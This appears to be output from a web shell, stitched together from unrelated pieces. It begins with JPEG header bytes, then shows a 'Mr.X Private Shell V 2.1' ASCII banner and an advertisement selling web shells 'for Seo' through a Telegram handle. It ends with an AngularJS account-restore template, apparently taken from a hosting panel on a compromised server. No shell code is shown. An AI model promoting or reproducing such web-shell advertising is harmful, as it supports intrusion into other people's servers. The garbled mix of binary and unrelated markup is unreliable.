����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<div ng-controller="restoreSingleAccount" class="controller-box">
<div style="max-width: 500px; margin: 0 auto;" ng-if="!accountData._id && perm.canManageAccounts">
<label>{{ lang.t("Choose Account") }}</label>
<p class="help-block">{{lang.t("Enter the active account you'd like to restore or download in the search box below. To restore orphan accounts, go to")}} <a style="color: #fd6b2b;" href="{{primaryURL}}/accountsOrphans">{{lang.t("Accounts > View Orphan accounts")}}</a></p>
<div class="input-group" style="display: block;">
<md-autocomplete
id="accountSelection"
md-search-text="autocomplete.accountText"
md-no-cache="true"
md-clear-button="false"
md-input-id="accountSelection"
md-menu-class="account-selection-results"
md-selected-item-change="selectAccount(account)"
md-item-text="account.username"
md-items="account in searchAccounts(autocomplete.accountText)"
md-min-length="2"
placeholder="{{ lang.t('Search Account...') }}">
<md-item-template>
<div ng-include="includePath('accountDropdown')"></div>
</md-item-template>
<md-not-found>
{{ lang.t("No active accounts matching \"%s\" were found.", autocomplete.accountText) }}
</md-not-found>
</md-autocomplete>
</div>
</div>
<div ng-if="accountData._id && perm.canManageAccounts" style="text-align: center;">
<h1>{{ lang.t("Selected account \"%s\"", (accountData.virtual && accountData.nickname ? accountData.nickname : accountData.username)) }}</h1>
<a href="" ng-click="clearAccount()">{{ lang.t("Change account") }}</a>
</div>
<div ng-if="accountData._id" ng-include="includePath('restoreSingle')"></div>
</div>